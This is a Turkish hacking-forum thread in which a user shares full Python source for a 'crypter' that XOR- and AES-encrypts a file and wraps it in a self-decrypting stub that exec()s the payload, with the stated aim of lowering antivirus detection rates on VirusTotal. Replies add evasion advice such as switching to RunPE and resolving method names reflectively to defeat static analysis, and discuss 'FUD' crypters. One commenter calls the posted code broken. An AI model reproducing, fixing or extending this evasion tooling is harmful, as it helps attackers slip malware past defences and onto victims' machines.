Crypterimizi Yapalım Bölüm #2

z3n

z3n

Üye
26 Kas 2023
157
94
q4cdak9.jpeg

Merhaba bugün gerçek bir crypter yapacağız. Kodların hepsini paylaşacağım ve eğer başarılı olursak virustotalde bir
dosyayı 30/71 gösteriyorken 7/71'e düşürebilip ud crypter yapabileceğiz.
204jj6g.gif

Bu kodumuzda dosyayı şifreleyecek sonra ise dosyaya o şifreyi çözüp çalıştırma mekanizması ekleyeceğiz.
9gb6a8a.gif

Kod:
import base64 from Crypto.Cipher import AES from Crypto.Random import get_random_bytes from Crypto.Util.Padding import pad import tkinter as tk from tkinter import filedialog def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = pad(data, AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def encrypt_file(file_path, key, iv): with open(file_path, 'rb') as file: data = file.read() encrypted_data = aes_encrypt(xor_crypt(data, key), key, iv) decode = f"""import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = base64.b64decode('{base64.b64encode(data).decode()}') cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def aes_decrypt(data, key, iv): cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_data = cipher.decrypt(data) return unpad(decrypted_data, AES.block_size) key = {key} iv = {iv} original_data = base64.b64decode('{base64.b64encode(encrypted_data).decode()}') encrypted_data = aes_encrypt(xor_crypt(original_data, key), key, iv) decrypted_data = xor_crypt(aes_decrypt(encrypted_data, key, iv), key) exec(decrypted_data) """ encrypted_file_path = file_path with open(encrypted_file_path, 'wb') as encrypted_file: encrypted_file.write(decode.encode()) return encrypted_file_path def browse_file(): file_path = filedialog.askopenfilename() key = get_random_bytes(16) iv = get_random_bytes(16) encrypted_file_path = encrypt_file(file_path, key, iv) result_label.config(text=f"File Encrypted: {encrypted_file_path}") app = tk.Tk() app.title("MyCrypter") app.geometry("400x200") browse_button = tk.Button(app, text="Browse", command=browse_file) browse_button.pack(pady=20) result_label = tk.Label(app, text="") result_label.pack() app.mainloop()
 
invisible blood

invisible blood

Uzman üye
15 Eyl 2023
1,177
442
z3n' Alıntı:
q4cdak9.jpeg

Merhaba bugün gerçek bir crypter yapacağız. Kodların hepsini paylaşacağım ve eğer başarılı olursak virustotalde bir
dosyayı 30/71 gösteriyorken 7/71'e düşürebilip ud crypter yapabileceğiz.
204jj6g.gif

Bu kodumuzda dosyayı şifreleyecek sonra ise dosyaya o şifreyi çözüp çalıştırma mekanizması ekleyeceğiz.
9gb6a8a.gif

Kod:
import base64 from Crypto.Cipher import AES from Crypto.Random import get_random_bytes from Crypto.Util.Padding import pad import tkinter as tk from tkinter import filedialog def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = pad(data, AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def encrypt_file(file_path, key, iv): with open(file_path, 'rb') as file: data = file.read() encrypted_data = aes_encrypt(xor_crypt(data, key), key, iv) decode = f"""import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = base64.b64decode('{base64.b64encode(data).decode()}') cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def aes_decrypt(data, key, iv): cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_data = cipher.decrypt(data) return unpad(decrypted_data, AES.block_size) key = {key} iv = {iv} original_data = base64.b64decode('{base64.b64encode(encrypted_data).decode()}') encrypted_data = aes_encrypt(xor_crypt(original_data, key), key, iv) decrypted_data = xor_crypt(aes_decrypt(encrypted_data, key, iv), key) exec(decrypted_data) """ encrypted_file_path = file_path with open(encrypted_file_path, 'wb') as encrypted_file: encrypted_file.write(decode.encode()) return encrypted_file_path def browse_file(): file_path = filedialog.askopenfilename() key = get_random_bytes(16) iv = get_random_bytes(16) encrypted_file_path = encrypt_file(file_path, key, iv) result_label.config(text=f"File Encrypted: {encrypted_file_path}") app = tk.Tk() app.title("MyCrypter") app.geometry("400x200") browse_button = tk.Button(app, text="Browse", command=browse_file) browse_button.pack(pady=20) result_label = tk.Label(app, text="") result_label.pack() app.mainloop()
Genişletmek için tıkla ...
Ellerinize sağlık hocam.
 
T

tamam ağa

Uzman üye
7 Haz 2023
1,458
831
Exec fonksiyonu kodu dinamik olarak çalıştırır, yani kodun çalıştırıldığı anda güvenlik programları ötecektir bunun yerine run pe kullanabilirsin.
 
z3n

z3n

Üye
26 Kas 2023
157
94
Doğru diyorsun bunu düzenlemek daha mantıklı haklısın
 
A

alexandre20

Katılımcı Üye
13 Tem 2022
897
700
Klasik bir dropper patterni oluşuyor, piyasadaki en statik antivirüs bile sadece regex kullanarak zararlı olarak flagler. Metodlara erişirken direkt isim belirtmek yerine reflective bir şekilde runtime sırasında method isimlerini çözümleyerek statik analizi zorlaştırabilirsin.
 
Bunjo

Bunjo

Uzman üye
14 Ara 2020
1,587
1,883
HTTParty
Kodu "Python" kodu olarak konu düzenlemesi kısmından yukarıdaki kod seçeneği ile düzenlerseniz daha iyi bir kalıcılık elde edebilirsin.
 
A

alexandre20

Katılımcı Üye
13 Tem 2022
897
700
BlackDynamite' Alıntı:
burda bisey hissediyorum
Genişletmek için tıkla ...
Özgüven eksikliğini gösteriyor :) Ne yapalım? wormGPT'den veya githubdan kopyala yapıştır ile çalınmış, sadece rengi değiştirilmiş ve doğru düzgün indenting bile olmadan formatlanmış bozuk python scriptleri mi spamlayalım forumda?

Fazla konu açmak = İyi kalite anlamına gelmiyor. Tam aksine bu konu gibi shitposttan hallice ve kimsenin işine yaramayacak konu anlamına geliyor.
Açıkçası moderator olsam konuyu direkt çöpe taşırdım, kod çalışmıyor, requirements.txt verilmemiş. Nasıl kullanılacağı anlatılmamış. Kodu çalışabilir hale getirmek için baştan sona tekrar yazman gerekiyor (konu sahibi tab'ları ve boşlukları tekrar eklemeye zahmet etmemiş paşam).

Diyelim ki kodu bir şekilde çalışabilir hale getirdin, bu sefer UD ile alakası olmayan çıktılar verecek. Verdiği dosya çalışmayacak (çünkü çalışması için bu python scriptine ihtiyaç var). Bunun için gidip py2exe yapıp diğer resource'ları içine packleyeceksin falan... Sonra virustotalde olduğundan daha fazla skor alacaksın ve 2 saatin boşa gitmiş olacak.
 
Son düzenleme:
BlackDynamite

BlackDynamite

Katılımcı Üye
7 Kas 2023
822
315
alexandre20' Alıntı:
Özgüven eksikliğini gösteriyor :) Ne yapalım? wormGPT'den veya githubdan kopyala yapıştır ile çalınmış, sadece rengi değiştirilmiş ve doğru düzgün indenting bile olmadan formatlanmış bozuk python scriptleri mi spamlayalım forumda?

Fazla konu açmak = İyi kalite anlamına gelmiyor. Tam aksine bu konu gibi shitposttan hallice ve kimsenin işine yaramayacak konu anlamına geliyor.
Açıkçası moderator olsam konuyu direkt çöpe taşırdım, kod çalışmıyor, requirements.txt verilmemiş. Nasıl kullanılacağı anlatılmamış. Kodu çalışabilir hale getirmek için baştan sona tekrar yazman gerekiyor (konu sahibi tab'ları ve boşlukları tekrar eklemeye zahmet etmemiş paşam).

Diyelim ki kodu bir şekilde çalışabilir hale getirdin, bu sefer UD ile alakası olmayan çıktılar verecek. Verdiği dosya çalışmayacak (çünkü çalışması için bu python scriptine ihtiyaç var). Bunun için gidip py2exe yapıp diğer resource'ları içine packleyeceksin falan... Sonra virustotalde olduğundan daha fazla skor alacaksın ve 2 saatin boşa gitmiş olacak.
Genişletmek için tıkla ...
hocam bilginize hayran kaldım paylasırmısın madem ne güzel siir gibi yazıyonuz güzel anlatım kaymak gibi sizide sahnede görelim hocam bizi etkileyin neyse hocam size iyi günler
 
Son düzenleme:
z3n

z3n

Üye
26 Kas 2023
157
94
Beyler ben size fud yapımını öğretecek olsam turkhackteam forumunda değil dark webde shopta satarım yani
 
z3n

z3n

Üye
26 Kas 2023
157
94
Dm gel orada söv, fud yapımını kesin anlatmamı bekliyordun sanki. İnsanlar için güzel bir öğretici. Umarım senin gibi insanlarda fazla kibri bırakır ancak yinede şunu demek isterim ki

"Gel, Gel, Ne Olursan Ol Yine Gel"
Mevlana
alexandre20' Alıntı:
yanlış anlama ama sen bir ***** öğretemezsin. bildigin bir sey de yok.
Genişletmek için tıkla ...
 
T

tamam ağa

Uzman üye
7 Haz 2023
1,458
831
z3n' Alıntı:
Beyler ben size fud yapımını öğretecek olsam turkhackteam forumunda değil dark webde shopta satarım yani
Genişletmek için tıkla ...
Dostum bu zamanda fud yapamazsın crypter devri kapandı.
Antiviruslerin çoğu makina öğrenmesi kullanıyor EXE yi şifreyelip calistirsanda yakalanma olasılığı çok buyuk.
 
z3n

z3n

Üye
26 Kas 2023
157
94
tamam ağa' Alıntı:
Dostum bu zamanda fud yapamazsın crypter devri kapandı.
Antiviruslerin çoğu makina öğrenmesi kullanıyor EXE yi şifreyelip calistirsanda yakalanma olasılığı çok buyuk.
Genişletmek için tıkla ...
Yaklanmama ihtimali az da olsa var ancak yine de bakmak isteyen arkadaşlara iyi olur diye söyledim. Buraları küfürle doldurmaya ne gerek var.
 
R

rufiqcavadov

Katılımcı Üye
21 Eyl 2019
904
137
Sadece Kaspersky yakalıyor exe dosyasını ama gerçekten eline sağlık fakat tek sorun exe'yi çalıştıramıyorum. İmzayı sildiği için mi acaba?

Dosyayı tekrar nasıl imzalarım?
 
Son düzenleme:
BlackDynamite

BlackDynamite

Katılımcı Üye
7 Kas 2023
822
315
tamam ağa' Alıntı:
Dostum bu zamanda fud yapamazsın crypter devri kapandı.
Antiviruslerin çoğu makina öğrenmesi kullanıyor EXE yi şifreyelip calistirsanda yakalanma olasılığı çok buyuk.
Genişletmek için tıkla ...
8 ay dayanan fudlar crypterlar var nasıl yazıldığına bağlı günden güne gelisiyor native fuda göre net fud daha kolay patlar native biraz daha analizi zordur
 
Son düzenleme:
emir_kanloglu

emir_kanloglu

Üye
1 May 2022
67
21
z3n' Alıntı:
q4cdak9.jpeg

Merhaba bugün gerçek bir crypter yapacağız. Kodların hepsini paylaşacağım ve eğer başarılı olursak virustotalde bir
dosyayı 30/71 gösteriyorken 7/71'e düşürebilip ud crypter yapabileceğiz.
204jj6g.gif

Bu kodumuzda dosyayı şifreleyecek sonra ise dosyaya o şifreyi çözüp çalıştırma mekanizması ekleyeceğiz.
9gb6a8a.gif

Kod:
import base64 from Crypto.Cipher import AES from Crypto.Random import get_random_bytes from Crypto.Util.Padding import pad import tkinter as tk from tkinter import filedialog def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = pad(data, AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def encrypt_file(file_path, key, iv): with open(file_path, 'rb') as file: data = file.read() encrypted_data = aes_encrypt(xor_crypt(data, key), key, iv) decode = f"""import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad def xor_crypt(data, key): key = key * (len(data) // len(key) + 1) return bytes(x ^ y for x, y in zip(data, key)) def aes_encrypt(data, key, iv): padded_data = base64.b64decode('{base64.b64encode(data).decode()}') cipher = AES.new(key, AES.MODE_CBC, iv) return cipher.encrypt(padded_data) def aes_decrypt(data, key, iv): cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_data = cipher.decrypt(data) return unpad(decrypted_data, AES.block_size) key = {key} iv = {iv} original_data = base64.b64decode('{base64.b64encode(encrypted_data).decode()}') encrypted_data = aes_encrypt(xor_crypt(original_data, key), key, iv) decrypted_data = xor_crypt(aes_decrypt(encrypted_data, key, iv), key) exec(decrypted_data) """ encrypted_file_path = file_path with open(encrypted_file_path, 'wb') as encrypted_file: encrypted_file.write(decode.encode()) return encrypted_file_path def browse_file(): file_path = filedialog.askopenfilename() key = get_random_bytes(16) iv = get_random_bytes(16) encrypted_file_path = encrypt_file(file_path, key, iv) result_label.config(text=f"File Encrypted: {encrypted_file_path}") app = tk.Tk() app.title("MyCrypter") app.geometry("400x200") browse_button = tk.Button(app, text="Browse", command=browse_file) browse_button.pack(pady=20) result_label = tk.Label(app, text="") result_label.pack() app.mainloop()
Genişletmek için tıkla ...
Elinize emeğinize sağlık..
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.